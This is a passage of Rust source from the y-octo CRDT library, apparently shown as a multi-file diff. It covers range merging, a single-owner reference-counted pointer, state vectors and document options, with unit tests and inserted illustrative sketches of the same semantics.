if last_end > new_range.start {
diffs.push(new_range.start..last_end);
}
for overlap in &overlap_ranges {
if overlap.start > last_end {
diffs.push(last_end..overlap.start);
}
last_end = overlap.end;
}
if new_range.end > last_end {
diffs.push(last_end..new_range.end);
}
}
}
diffs
}
/// Push new range to current one.
/// Range will be merged if overlap exists or turned into fragment if it's
/// not continuous.
pub fn push(&mut self, range: Range<u64>) {
match self {
OrderRange::Range(r) => {
if r.start == r.end {
*self = range.into();
} else if is_continuous_range(r, &range) {
r.end = r.end.max(range.end);
r.start = r.start.min(range.start);
} else {
*self = OrderRange::Fragment(if r.start < range.start {
VecDeque::from([r.clone(), range])
} else {
VecDeque::from([range, r.clone()])
});
}
}
OrderRange::Fragment(ranges) => {
if ranges.is_empty() {
*self = OrderRange::Range(range);
} else {
OrderRange::push_inner(ranges, range);
self.make_single();
}
}
}
}
pub fn pop(&mut self) -> Option<Range<u64>> {
if self.is_empty() {
None
} else {
match self {
OrderRange::Range(range) => Some(mem::replace(range, 0..0)),
OrderRange::Fragment(list) => list.pop_front(),
}
}
}
pub fn merge(&mut self, other: Self) {
self.extend(&other);
}
fn make_fragment(&mut self) {
if let OrderRange::Range(range) = self {
*self = OrderRange::Fragment(if range.is_empty() {
VecDeque::new()
} else {
VecDeque::from([range.clone()])
});
}
}
fn make_single(&mut self) {
if let OrderRange::Fragment(ranges) = self
&& ranges.len() == 1
{
*self = OrderRange::Range(ranges[0].clone());
}
}
/// Merge all adjacent or overlapping ranges in the list.
pub fn squash(&mut self) {
// merge all available ranges
if let OrderRange::Fragment(ranges) = self {
if ranges.is_empty() {
*self = OrderRange::Range(0..0);
return;
}
let mut changed = false;
let mut merged = VecDeque::with_capacity(ranges.len());
let mut cur = ranges[0].clone();
for next in ranges.iter().skip(1) {
if is_continuous_range(&cur, next) {
cur.start = cur.start.min(next.start);
cur.end = cur.end.max(next.end);
changed = true;
} else {
merged.push_back(cur);
cur = next.clone();
}
}
merged.push_back(cur);
if merged.len() == 1 {
*self = OrderRange::Range(merged[0].clone());
} else if changed {
mem::swap(ranges, &mut merged);
}
}
}
fn push_inner(list: &mut VecDeque<Range<u64>>, range: Range<u64>) {
if list.is_empty() {
list.push_back(range);
} else {
let search_result = list.binary_search_by(|r| {
if is_continuous_range(r, &range) {
std::cmp::Ordering::Equal
} else if r.end < range.start {
std::cmp::Ordering::Less
} else {
std::cmp::Ordering::Greater
}
});
match search_result {
Ok(idx) => {
let old = &mut list[idx];
list[idx] = old.start.min(range.start)..old.end.max(range.end);
Self::squash_around(list, idx);
}
Err(idx) => {
list.insert(idx, range);
Self::squash_around(list, idx);
}
}
}
}
fn squash_around(list: &mut VecDeque<Range<u64>>, idx: usize) {
if idx > 0 {
let prev = &list[idx - 1];
let cur = &list[idx];
if is_continuous_range(prev, cur) {
list[idx - 1] = prev.start.min(cur.start)..prev.end.max(cur.end);
list.remove(idx);
}
}
if idx < list.len() - 1 {
let next = &list[idx + 1];
let cur = &list[idx];
if is_continuous_range(cur, next) {
list[idx] = cur.start.min(next.start)..cur.end.max(next.end);
list.remove(idx + 1);
}
}
}
}
impl<'a> IntoIterator for &'a OrderRange {
type Item = Range<u64>;
type IntoIter = OrderRangeIter<'a>;
fn into_iter(self) -> Self::IntoIter {
OrderRangeIter { range: self, idx: 0 }
}
}
impl Extend<Range<u64>> for OrderRange {
fn extend<T: IntoIterator<Item = Range<u64>>>(&mut self, other: T) {
self.make_fragment();
match self {
OrderRange::Fragment(ranges) => {
for range in other {
OrderRange::push_inner(ranges, range);
}
self.make_single();
}
_ => unreachable!(),
}
}
}
pub struct OrderRangeIter<'a> {
range: &'a OrderRange,
idx: usize,
}
impl Iterator for OrderRangeIter<'_> {
type Item = Range<u64>;
fn next(&mut self) -> Option<Self::Item> {
match self.range {
OrderRange::Range(range) => {
if self.idx == 0 {
self.idx += 1;
Some(range.clone())
} else {
None
}
}
OrderRange::Fragment(ranges) => {
if self.idx < ranges.len() {
let range = ranges[self.idx].clone();
self.idx += 1;
Some(range)
} else {
None
}
}
}
}
}
#[cfg(test)]
#[allow(clippy::single_range_in_vec_init)]
mod tests {
use super::OrderRange;
#[test]
fn test_range_push() {
let mut range: OrderRange = (0..10).into();
range.push(5..15);
assert_eq!(range, OrderRange::Range(0..15));
// turn to fragment
range.push(20..30);
assert_eq!(range, OrderRange::from(vec![(0..15), (20..30)]));
// auto merge
range.push(15..16);
assert_eq!(range, OrderRange::from(vec![(0..16), (20..30)]));
// squash
range.push(16..20);
assert_eq!(range, OrderRange::Range(0..30));
}
#[test]
fn test_range_pop() {
let mut range: OrderRange = vec![(0..10), (20..30)].into();
assert_eq!(range.pop(), Some(0..10));
let mut range: OrderRange = (0..10).into();
assert_eq!(range.pop(), Some(0..10));
assert!(range.is_empty());
assert_eq!(range.pop(), None);
}
#[test]
fn test_ranges_squash() {
let mut range = OrderRange::from(vec![(0..10), (20..30)]);
// do nothing
range.squash();
assert_eq!(range, OrderRange::from(vec![(0..10), (20..30)]));
// merged into list
range = OrderRange::from(vec![(0..10), (10..20), (30..40)]);
range.squash();
assert_eq!(range, OrderRange::from(vec![(0..20), (30..40)]));
// turn to range
range = OrderRange::from(vec![(0..10), (10..20), (20..30)]);
range.squash();
assert_eq!(range, OrderRange::Range(0..30));
}
#[test]
fn test_range_covered() {
assert!(!OrderRange::check_range_covered(&[0..1], &[2..3]));
assert!(OrderRange::check_range_covered(&[0..1], &[0..3]));
assert!(!OrderRange::check_range_covered(&[0..1], &[1..3]));
assert!(OrderRange::check_range_covered(&[0..1], &[0..3]));
assert!(OrderRange::check_range_covered(&[1..2], &[0..3]));
assert!(OrderRange::check_range_covered(&[1..2, 2..3], &[0..3]));
assert!(!OrderRange::check_range_covered(&[1..2, 2..3, 3..4], &[0..3]));
assert!(OrderRange::check_range_covered(&[0..1, 2..3], &[0..2, 2..4]));
assert!(OrderRange::check_range_covered(&[0..1, 2..3, 3..4], &[0..2, 2..4]),);
}
#[test]
fn test_range_diff() {
{
let old = OrderRange::Range(0..1);
let new = OrderRange::Range(2..3);
let ranges = old.diff_range(&new);
assert_eq!(ranges, vec![]);
}
{
let old = OrderRange::Range(0..10);
let new = OrderRange::Range(0..11);
let ranges = old.diff_range(&new);
assert_eq!(ranges, vec![(10..11)]);
}
{
let old: OrderRange = vec![(0..10), (20..30)].into();
let new: OrderRange = vec![(0..15), (20..30)].into();
let ranges = old.diff_range(&new);
assert_eq!(ranges, vec![(10..15)]);
}
{
let old: OrderRange = vec![(0..3), (5..7), (8..10), (16..18), (21..23)].into();
let new: OrderRange = vec![(0..12), (15..23)].into();
let ranges = old.diff_range(&new);
assert_eq!(ranges, vec![(3..5), (7..8), (10..12), (15..16), (18..21)]);
}
{
let old: OrderRange = vec![(1..6), (8..12)].into();
let new: OrderRange = vec![(0..12), (15..23), (24..28)].into();
let ranges = old.diff_range(&new);
assert_eq!(ranges, vec![(0..1), (6..8), (15..23), (24..28)]);
}
}
#[test]
fn test_range_extend() {
let mut range: OrderRange = (0..10).into();
range.merge((20..30).into());
assert_eq!(range, OrderRange::from(vec![(0..10), (20..30)]));
let mut range: OrderRange = (0..10).into();
range.merge(vec![(10..15), (20..30)].into());
assert_eq!(range, OrderRange::from(vec![(0..15), (20..30)]));
let mut range: OrderRange = vec![(0..10), (20..30)].into();
range.merge((10..20).into());
assert_eq!(range, OrderRange::Range(0..30));
let mut range: OrderRange = vec![(0..10), (20..30)].into();
range.merge(vec![(10..20), (30..40)].into());
assert_eq!(range, OrderRange::Range(0..40));
}
#[test]
fn iter() {
let range: OrderRange = vec![(0..10), (20..30)].into();
assert_eq!(range.into_iter().collect::<Vec<_>>(), vec![(0..10), (20..30)]);
let range: OrderRange = OrderRange::Range(0..10);
assert_eq!(range.into_iter().collect::<Vec<_>>(), vec![(0..10)]);
}
}
@@ -1,516 +0,0 @@
use std::{
cell::UnsafeCell,
fmt::{self, Write},
hash::{Hash, Hasher},
marker::PhantomData,
mem,
ops::{Deref, DerefMut},
ptr::NonNull,
};
use crate::sync::Ordering;
const DANGLING_PTR: usize = usize::MAX;
#[inline]
fn is_dangling<T>(ptr: NonNull<T>) -> bool {
ptr.as_ptr() as usize == DANGLING_PTR
}
/// Heap data with single owner but multiple refs with dangling checking at
/// runtime.
pub(crate) enum Somr<T> {
Owned(Owned<T>),
Ref(Ref<T>),
}
#[repr(transparent)]
pub(crate) struct Owned<T>(NonNull<SomrInner<T>>);
#[repr(transparent)]
pub(crate) struct Ref<T>(NonNull<SomrInner<T>>);
#[cfg(feature = "large_refs")]
type RefAtomicType = crate::sync::AtomicU32;
#[cfg(feature = "large_refs")]
type RefPrimitiveType = u32;
#[cfg(not(feature = "large_refs"))]
type RefAtomicType = crate::sync::AtomicU16;
#[cfg(not(feature = "large_refs"))]
type RefPrimitiveType = u16;
pub(crate) struct SomrInner<T> {
data: Option<UnsafeCell<T>>,
/// increase the size if we ever hit a scenario with more than
/// u16::MAX (65535) refs
refs: RefAtomicType,
_marker: PhantomData<Option<T>>,
}
pub(crate) struct InnerRefMut<'a, T> {
inner: NonNull<T>,
_marker: PhantomData<&'a mut T>,
}
impl<T> Deref for InnerRefMut<'_, T> {
type Target = T;
fn deref(&self) -> &Self::Target {
unsafe { &*self.inner.as_ptr() }
}
}
impl<T> DerefMut for InnerRefMut<'_, T> {
fn deref_mut(&mut self) -> &mut Self::Target {
unsafe { &mut *self.inner.as_ptr() }
}
}
unsafe impl<T: Send> Send for Somr<T> {}
unsafe impl<T: Sync> Sync for Somr<T> {}
impl<T> Default for Somr<T> {
fn default() -> Self {
Self::none()
}
}
impl<T> Somr<T> {
pub fn new(data: T) -> Self {
let inner = Box::new(SomrInner {
data: Some(UnsafeCell::new(data)),
refs: RefAtomicType::new(1),
_marker: PhantomData,
});
Self::Owned(Owned(Box::leak(inner).into()))
}
pub fn none() -> Self {
Self::Ref(Ref(NonNull::new(DANGLING_PTR as *mut _).unwrap()))
}
}
impl<T> SomrInner<T> {
fn data_ref(&self) -> Option<&T> {
self.data.as_ref().map(|x| unsafe { &*x.get() })
}
fn data_mut(&self) -> Option<InnerRefMut<'_, T>> {
self.data.as_ref().map(|x| InnerRefMut {
inner: unsafe { NonNull::new_unchecked(x.get()) },
_marker: PhantomData,
})
}
}
impl<T> Somr<T> {
#[inline]
pub fn is_none(&self) -> bool {
self.dangling() || self.inner().data_ref().is_none()
}
#[inline]
pub fn is_some(&self) -> bool {
!self.dangling() && self.inner().data_ref().is_some()
}
pub fn get(&self) -> Option<&T> {
if self.dangling() {
return None;
}
self.inner().data_ref()
}
pub unsafe fn get_unchecked(&self) -> &T {
if self.dangling() {
panic!("Try to visit Somr data that has already been dropped.")
}
match &self.inner().data_ref() {
Some(data) => data,
None => {
panic!("Try to unwrap on None")
}
}
}
#[allow(unused)]
pub fn get_mut(&mut self) -> Option<&mut T> {
if !self.is_owned() || self.dangling() {
return None;
}
let inner = self.inner_mut();
inner.data.as_mut().map(|x| x.get_mut())
}
#[allow(unused)]
pub unsafe fn get_mut_from_ref(&self) -> Option<InnerRefMut<'_, T>> {
if !self.is_owned() || self.dangling() {
return None;
}
let inner = self.inner_mut();
inner.data_mut()
}
pub unsafe fn get_mut_unchecked(&self) -> InnerRefMut<'_, T> {
if self.dangling() {
panic!("Try to visit Somr data that has already been dropped.")
}
match self.inner_mut().data_mut() {
Some(data) => data,
None => {
panic!("Try to unwrap on None")
}
}
}
#[inline]
pub fn is_owned(&self) -> bool {
matches!(self, Self::Owned(_))
}
pub fn swap_take(&mut self) -> Self {
debug_assert!(self.is_owned());
let mut r = self.clone();
mem::swap(self, &mut r);
r
}
#[inline]
fn inner(&self) -> &SomrInner<T> {
debug_assert!(!self.dangling());
unsafe { self.ptr().as_ref() }
}
#[inline]
#[allow(clippy::mut_from_ref)]
fn inner_mut(&self) -> &mut SomrInner<T> {
debug_assert!(!self.dangling());
unsafe { self.ptr().as_mut() }
}
#[inline]
pub fn ptr(&self) -> NonNull<SomrInner<T>> {
match self {
Somr::Owned(ptr) => ptr.0,
Somr::Ref(ptr) => ptr.0,
}
}
#[inline]
pub fn ptr_eq(&self, other: &Self) -> bool {
std::ptr::eq(self.ptr().as_ptr(), other.ptr().as_ptr())
}
#[inline]
fn dangling(&self) -> bool {
is_dangling(self.ptr())
}
}
impl<T> Clone for Somr<T> {
fn clone(&self) -> Self {
if self.dangling() {
return Self::none();
}
let inner = unsafe { &*self.ptr().as_ptr() };
let old_size = inner.refs.fetch_add(1, Ordering::Relaxed);
if old_size == RefPrimitiveType::MAX {
panic!("Too many refs on Somr, maybe we need to increase the limitation now.")
}
Self::Ref(Ref(self.ptr()))
}
}
impl<T> Drop for Owned<T> {
fn drop(&mut self) {
let inner = unsafe { &mut *self.0.as_ptr() };
// ensure all reads are finished
// See [Arc::Drop]
inner.refs.load(Ordering::Acquire);
inner.data.take();
drop(Ref(self.0));
}
}
impl<T> Drop for Ref<T> {
fn drop(&mut self) {
if is_dangling(self.0) {
return;
}
let rc = unsafe { &(*self.0.as_ptr()).refs };
// no other refs
if rc.fetch_sub(1, Ordering::Release) == 1 {
// ensure all reads are finished
// See [Arc::Drop]
rc.load(Ordering::Acquire);
drop(unsafe { Box::from_raw(self.0.as_ptr()) });
}
}
}
impl<T> From<T> for Somr<T> {
fn from(value: T) -> Self {
Somr::new(value)
}
}
impl<T> From<Option<Somr<T>>> for Somr<T> {
fn from(value: Option<Somr<T>>) -> Self {
value.unwrap_or_default()
}
}
pub trait FlattenGet<T> {
#[allow(dead_code)]
fn flatten_get(&self) -> Option<&T>;
}
impl<T> FlattenGet<T> for Option<Somr<T>> {
fn flatten_get(&self) -> Option<&T> {
self.as_ref().and_then(|data| data.get())
}
}
impl<T: PartialEq> PartialEq for Somr<T> {
fn eq(&self, other: &Self) -> bool {
self.ptr() == other.ptr() || !self.dangling() && !other.dangling() && self.inner() == other.inner()
}
}
impl<T: PartialEq> PartialEq for SomrInner<T> {
fn eq(&self, other: &Self) -> bool {
self.data_ref() == other.data_ref()
}
}
impl<T: Eq> Eq for Somr<T> {}
impl<T: PartialOrd> PartialOrd for Somr<T> {
fn partial_cmp(&self, other: &Self) -> Option<std::cmp::Ordering> {
match (self.get(), other.get()) {
(Some(a), Some(b)) => a.partial_cmp(b),
_ => None,
}
}
}
impl<T> Hash for Somr<T> {
fn hash<H: Hasher>(&self, state: &mut H) {
self.ptr().hash(state)
}
}
impl<T: fmt::Debug> fmt::Debug for Somr<T> {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
if self.is_owned() {
f.write_str("Owned(")?;
} else {
f.write_str("Ref(")?;
}
if let Some(value) = self.get() {
fmt::Debug::fmt(value, f)?;
} else {
f.write_str("None")?;
}
f.write_char(')')
}
}
impl<T: fmt::Display> fmt::Display for Somr<T> {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
if self.is_owned() {
f.write_str("Owned(")?;
} else {
f.write_str("Ref(")?;
}
if let Some(value) = self.get() {
fmt::Display::fmt(value, f)?;
} else {
f.write_str("None")?;
}
f.write_char(')')
}
}
impl<T: Sized> fmt::Pointer for Somr<T> {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
fmt::Pointer::fmt(&(self.get().unwrap() as *const T), f)
}
}
#[cfg(all(test, not(loom)))]
impl<T: proptest::arbitrary::Arbitrary> proptest::arbitrary::Arbitrary for Somr<T> {
type Parameters = T::Parameters;
type Strategy = proptest::strategy::MapInto<T::Strategy, Self>;
fn arbitrary_with(args: Self::Parameters) -> Self::Strategy {
proptest::strategy::Strategy::prop_map_into(proptest::arbitrary::any_with::<T>(args))
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::loom_model;
#[test]
fn basic_example() {
loom_model!({
let five = Somr::new(5);
assert_eq!(five.get(), Some(&5));
let five_ref = five.clone();
assert!(!five_ref.is_owned());
assert_eq!(five_ref.get(), Some(&5));
assert_eq!(five_ref.ptr().as_ptr() as usize, five.ptr().as_ptr() as usize);
drop(five);
// owner released
assert_eq!(five_ref.get(), None);
});
}
#[test]
fn complex_struct() {
loom_model!({
struct T {
a: usize,
b: String,
}
let t1 = Somr::new(T {
a: 1,
b: "hello".to_owned(),
});
assert_eq!(t1.get().unwrap().a, 1);
assert_eq!(t1.get().unwrap().b.as_str(), "hello");
let t2 = t1.clone();
assert!(!t2.is_owned());
assert_eq!(t2.ptr().as_ptr() as usize, t1.ptr().as_ptr() as usize);
assert_eq!(t2.get().unwrap().a, 1);
assert_eq!(t2.get().unwrap().b.as_str(), "hello");
drop(t1);
assert!(t2.get().is_none());
});
}
#[test]
fn acquire_mut_ref() {
loom_model!({
let mut five = Somr::new(5);
*five.get_mut().unwrap() += 1;
assert_eq!(five.get(), Some(&6));
let five_ref = five.clone();
// only the owner can hand out a mutable reference
assert!(five_ref.get().is_some());
assert!(unsafe { five_ref.get_mut_from_ref() }.is_none());
drop(five);
});
}
#[test]
fn comparison() {
loom_model!({
let five = Somr::new(5);
let five_ref = five.clone();
let another_five = Somr::new(5);
let six = Somr::new(6);
assert_eq!(five, five_ref);
assert_eq!(five, another_five);
assert_eq!(five.ptr().as_ptr(), five_ref.ptr().as_ptr());
assert_ne!(five.ptr().as_ptr(), another_five.ptr().as_ptr());
assert!(six > five);
assert!(six > five_ref);
assert_eq!(five_ref.partial_cmp(&six), Some(std::cmp::Ordering::Less));
drop(five);
assert_eq!(five_ref.partial_cmp(&six), None);
});
}
#[test]
fn represent_none() {
loom_model!({
let none = Somr::<u32>::none();
assert!(!none.is_owned());
assert!(none.is_none());
assert!(none.get().is_none());
});
}
#[test]
fn drop_ref_without_affecting_owner() {
loom_model!({
let five = Somr::new(5);
let five_ref = five.clone();
assert_eq!(five.get().unwrap(), &5);
assert_eq!(five_ref.get().unwrap(), &5);
drop(five_ref);
assert_eq!(five.get().unwrap(), &5);
});
}
#[test]
fn swap_take() {
loom_model!({
let mut five = Somr::new(5);
let owned = five.swap_take();
assert_eq!(owned.get().unwrap(), &5);
assert_eq!(five.get().unwrap(), &5);
assert!(owned.is_owned());
assert!(!five.is_owned());
});
}
// This would be UB if `Somr` did not use `UnsafeCell`
#[test]
fn test_inner_mut() {
loom_model!({
let five = Somr::new(5);
fn add(a: &Somr<i32>, b: &Somr<i32>) {
unsafe { a.get_mut_from_ref() }
.map(|mut x| *x += *b.get().unwrap())
.unwrap();
}
add(&five, &five);
assert_eq!(five.get().copied().unwrap(), 10);
});
}
}
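// The tests above exercise an owner/reference split: cloning yields a
// non-owning handle, and dropping the owner makes every reference read `None`.
// The block below is only a loose analogy built on `Rc`/`Weak` from std; it is
// not how `Somr` is implemented (the code above works with raw pointers and
// `UnsafeCell`). `Handle`, `make_ref`, and `sketch_owner_drop` are hypothetical
// names introduced for illustration.

```rust
use std::rc::{Rc, Weak};

// Hypothetical stand-in: an owner keeps the value alive, a ref only observes it.
enum Handle<T> {
    Owner(Rc<T>),
    Ref(Weak<T>),
}

impl<T> Handle<T> {
    fn new(value: T) -> Self {
        Handle::Owner(Rc::new(value))
    }

    fn is_owned(&self) -> bool {
        matches!(self, Handle::Owner(_))
    }

    // Never duplicates ownership: the result is always a non-owning handle.
    fn make_ref(&self) -> Self {
        match self {
            Handle::Owner(rc) => Handle::Ref(Rc::downgrade(rc)),
            Handle::Ref(weak) => Handle::Ref(weak.clone()),
        }
    }

    // Returns a copy of the value, or `None` once the owner has been dropped.
    fn get(&self) -> Option<T>
    where
        T: Clone,
    {
        match self {
            Handle::Owner(rc) => Some((**rc).clone()),
            Handle::Ref(weak) => weak.upgrade().map(|rc| (*rc).clone()),
        }
    }
}

// Mirrors the shape of `basic_example`: read through a ref before and after
// the owner is released.
fn sketch_owner_drop() -> (Option<i32>, Option<i32>) {
    let five = Handle::new(5);
    let five_ref = five.make_ref();
    let before = five_ref.get();
    drop(five);
    let after = five_ref.get();
    (before, after)
}
```

// Unlike this sketch, the real type returns `Option<&T>` from `get` and can
// also represent an empty handle via `Somr::none()`.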
@@ -1,140 +0,0 @@
use std::ops::{Deref, DerefMut};
use super::{
Client, ClientMap, Clock, CrdtRead, CrdtReader, CrdtWrite, CrdtWriter, HASHMAP_SAFE_CAPACITY, HashMapExt, Id,
JwstCodecResult,
};
#[derive(Default, Debug, PartialEq, Clone)]
pub struct StateVector(ClientMap<Clock>);
impl StateVector {
pub fn set_max(&mut self, client: Client, clock: Clock) {
self
.entry(client)
.and_modify(|m_clock| {
if *m_clock < clock {
*m_clock = clock;
}
})
.or_insert(clock);
}
pub fn get(&self, client: &Client) -> Clock {
*self.0.get(client).unwrap_or(&0)
}
pub fn contains(&self, id: &Id) -> bool {
id.clock <= self.get(&id.client)
}
pub fn set_min(&mut self, client: Client, clock: Clock) {
self
.entry(client)
.and_modify(|m_clock| {
if *m_clock > clock {
*m_clock = clock;
}
})
.or_insert(clock);
}
pub fn iter(&self) -> impl Iterator<Item = (&Client, &Clock)> {
self.0.iter()
}
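/// Merges `other` into `self`. For every client in `other`, the smaller of
/// the two clocks is kept (see `set_min`); clients missing from `self` are
/// inserted with the clock from `other`.
pub fn merge_with(&mut self, other: &Self) {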
for (client, clock) in other.iter() {
self.set_min(*client, *clock);
}
}
}
impl Deref for StateVector {
type Target = ClientMap<Clock>;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for StateVector {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl<const N: usize> From<[(Client, Clock); N]> for StateVector {
fn from(value: [(Client, Clock); N]) -> Self {
let mut map = ClientMap::with_capacity(N);
for (client, clock) in value {
map.insert(client, clock);
}
Self(map)
}
}
impl<R: CrdtReader> CrdtRead<R> for StateVector {
fn read(decoder: &mut R) -> JwstCodecResult<Self> {
let len = decoder.read_var_u64()? as usize;
// See: [HASHMAP_SAFE_CAPACITY]
let mut map = ClientMap::with_capacity(len.min(HASHMAP_SAFE_CAPACITY));
for _ in 0..len {
let client = decoder.read_var_u64()?;
let clock = decoder.read_var_u64()?;
map.insert(client, clock);
}
map.shrink_to_fit();
Ok(Self(map))
}
}
impl<W: CrdtWriter> CrdtWrite<W> for StateVector {
fn write(&self, encoder: &mut W) -> JwstCodecResult {
encoder.write_var_u64(self.len() as u64)?;
for (client, clock) in self.iter() {
encoder.write_var_u64(*client)?;
encoder.write_var_u64(*clock)?;
}
Ok(())
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_state_vector_basic() {
let mut state_vector = StateVector::from([(1, 1), (2, 2), (3, 3)]);
assert_eq!(state_vector.len(), 3);
assert_eq!(state_vector.get(&1), 1);
state_vector.set_min(1, 0);
assert_eq!(state_vector.get(&1), 0);
state_vector.set_max(1, 4);
assert_eq!(state_vector.get(&1), 4);
// set a client that does not exist yet
state_vector.set_max(4, 1);
assert_eq!(state_vector.get(&4), 1);
// same client with larger clock
assert!(!state_vector.contains(&(1, 5).into()));
}
#[test]
fn test_state_vector_merge() {
let mut state_vector = StateVector::from([(1, 1), (2, 2), (3, 3)]);
let other_state_vector = StateVector::from([(1, 5), (2, 6), (3, 7)]);
state_vector.merge_with(&other_state_vector);
assert_eq!(state_vector, StateVector::from([(3, 3), (1, 1), (2, 2)]));
}
}
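// The merge semantics above are easy to misread, since `merge_with` keeps the
// minimum clock per client and not the maximum. A minimal sketch of the same
// rules over a plain std `HashMap`, assuming `u64` for both `Client` and
// `Clock`; `SketchStateVector` and `sketch_merge` are hypothetical names and
// not part of the crate.

```rust
use std::collections::HashMap;

// Hypothetical stand-in for `StateVector`, keyed by client id.
#[derive(Debug, Default, PartialEq)]
struct SketchStateVector(HashMap<u64, u64>);

impl SketchStateVector {
    // Unknown clients read as clock 0.
    fn get(&self, client: u64) -> u64 {
        self.0.get(&client).copied().unwrap_or(0)
    }

    // Keep the larger clock; insert `clock` if the client is new.
    fn set_max(&mut self, client: u64, clock: u64) {
        let entry = self.0.entry(client).or_insert(clock);
        *entry = (*entry).max(clock);
    }

    // Keep the smaller clock; insert `clock` if the client is new.
    fn set_min(&mut self, client: u64, clock: u64) {
        let entry = self.0.entry(client).or_insert(clock);
        *entry = (*entry).min(clock);
    }

    // Per-client minimum over the clients listed in `other`.
    fn merge_with(&mut self, other: &Self) {
        for (client, clock) in &other.0 {
            self.set_min(*client, *clock);
        }
    }
}

fn sketch_merge() -> SketchStateVector {
    let mut left = SketchStateVector(HashMap::from([(1, 1), (2, 6)]));
    let right = SketchStateVector(HashMap::from([(1, 5), (2, 2), (3, 7)]));
    left.merge_with(&right);
    left
}
```

// In `sketch_merge`, client 3 exists only on the right-hand side, so it is
// inserted with its clock unchanged, while clients 1 and 2 keep the smaller
// of their two clocks.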
@@ -1,726 +0,0 @@
#[cfg(feature = "events")]
use publisher::DocPublisher;
use super::{
history::StoreHistory,
store::{ChangedTypeRefs, StoreRef},
*,
};
use crate::sync::{Arc, RwLock};
#[cfg(feature = "debug")]
#[derive(Debug, Clone)]
pub struct DocStoreStatus {
pub nodes: usize,
pub delete_sets: usize,
pub types: usize,
pub dangling_types: usize,
pub pending_nodes: usize,
}
/// [DocOptions] used to create a new [Doc]
///
/// ```
/// use y_octo::DocOptions;
///
/// let doc = DocOptions::new()
/// .with_client_id(1)
/// .with_guid("guid".into())
/// .auto_gc(true)
/// .build();
///
/// assert_eq!(doc.guid(), "guid")
/// ```
#[derive(Clone, Debug)]
pub struct DocOptions {
pub guid: String,
pub client_id: u64,
pub gc: bool,
}
impl Default for DocOptions {
fn default() -> Self {
if cfg!(any(test, feature = "bench")) {
Self {
client_id: 1,
guid: "test".into(),
gc: true,
}
} else {
Self {
client_id: prefer_small_random(),
guid: nanoid::nanoid!(),
gc: true,
}
}
}
}
impl DocOptions {
pub fn new() -> Self {
Self::default()
}
pub fn with_client_id(mut self, client_id: u64) -> Self {
self.client_id = client_id;
self
}
pub fn with_guid(mut self, guid: String) -> Self {
self.guid = guid;
self
}
pub fn auto_gc(mut self, gc: bool) -> Self {
self.gc = gc;
self
}
pub fn build(self) -> Doc {
Doc::with_options(self)
}
}
impl From<DocOptions> for Any {
fn from(value: DocOptions) -> Self {
Any::Object(HashMap::from_iter([
("gc".into(), value.gc.into()),
("guid".into(), value.guid.into()),
]))
}
}
impl TryFrom<Any> for DocOptions {
type Error = JwstCodecError;
fn try_from(value: Any) -> Result<Self, Self::Error> {
match value {
Any::Object(map) => {
let mut options = DocOptions::default();
for (key, value) in map {
match key.as_str() {
"gc" => {
options.gc = bool::try_from(value)?;
}
"guid" => {
options.guid = String::try_from(value)?;
}
_ => {}
}
}
Ok(options)
}
_ => Err(JwstCodecError::UnexpectedType("Object")),
}
}
}
#[derive(Debug, Clone)]
pub struct Doc {
client_id: u64,
opts: DocOptions,
pub(crate) store: StoreRef,
#[cfg(feature = "events")]
pub publisher: Arc<DocPublisher>,
pub(crate) batch: Somr<Batch>,
}
unsafe impl Send for Doc {}
unsafe impl Sync for Doc {}
impl Default for Doc {
fn default() -> Self {
Doc::new()
}
}
impl PartialEq for Doc {
fn eq(&self, other: &Self) -> bool {
self.client_id == other.client_id
}
}
impl Doc {
pub fn new() -> Self {
Self::with_options(DocOptions::default())
}
pub fn with_options(options: DocOptions) -> Self {
let store = Arc::new(RwLock::new(DocStore::with_client(options.client_id)));
#[cfg(feature = "events")]
let publisher = Arc::new(DocPublisher::new(store.clone()));
Self {
client_id: options.client_id,
opts: options,
store,
#[cfg(feature = "events")]
publisher,
batch: Somr::none(),
}
}
pub fn with_client(client_id: u64) -> Self {
DocOptions::new().with_client_id(client_id).build()
}
pub fn client(&self) -> Client {
self.client_id
}
pub fn set_client(&mut self, client_id: u64) {
self.client_id = client_id;
}
pub fn renew_client(&mut self) {
self.client_id = prefer_small_random();
}
pub fn clients(&self) -> Vec<u64> {
self.store.read().unwrap().clients()
}
pub fn history(&self) -> StoreHistory {
let history = StoreHistory::new(&self.store);
history.resolve();
history
}
#[cfg(feature = "debug")]
pub fn store_status(&self) -> DocStoreStatus {
let store = self.store.read().unwrap();
DocStoreStatus {
nodes: store.total_nodes(),
delete_sets: store.total_delete_sets(),
types: store.total_types(),
dangling_types: store.total_dangling_types(),
pending_nodes: store.total_pending_nodes(),
}
}
pub(crate) fn get_changed(&self) -> ChangedTypeRefs {
self.store.write().unwrap().get_changed()
}
pub fn store_compare(&self, other: &Doc) -> bool {
let store = self.store.read().unwrap();
let other_store = other.store.read().unwrap();
store.deep_compare(&other_store)
}
pub fn options(&self) -> &DocOptions {
&self.opts
}
pub fn guid(&self) -> &str {
self.opts.guid.as_str()
}
// TODO:
// provide a better way instead of `_v1` methods
// when implementing `v2` binary format
pub fn try_from_binary_v1<T: AsRef<[u8]>>(binary: T) -> JwstCodecResult<Self> {
Self::try_from_binary_v1_with_options(binary, DocOptions::default())
}
pub fn try_from_binary_v1_with_options<T: AsRef<[u8]>>(binary: T, options: DocOptions) -> JwstCodecResult<Self> {
let mut doc = Doc::with_options(options);
doc.apply_update_from_binary_v1(binary)?;
Ok(doc)
}
pub fn apply_update_from_binary_v1<T: AsRef<[u8]>>(&mut self, binary: T) -> JwstCodecResult {
let mut decoder = RawDecoder::new(binary.as_ref());
let update = Update::read(&mut decoder)?;
self.apply_update(update)
}
pub fn apply_update(&mut self, mut update: Update) -> JwstCodecResult {
let mut store = self.store.write().unwrap();
let mut retry = false;
loop {
// clone every time to avoid ref count issue
let pending_types = update
.structs
.values()
.flatten()
.filter_map(|n| {
if let Node::Item(item_ref) = n
&& let Some(item) = item_ref.get()
&& let Content::Type(ty) = &item.content
{
Some((item.id, ty.clone()))
} else {
None
}
})
.collect();
for (mut s, offset) in update.iter(store.get_state_vector()) {
if let Node::Item(item) = &mut s {
debug_assert!(item.is_owned());
let mut item = unsafe { item.get_mut_unchecked() };
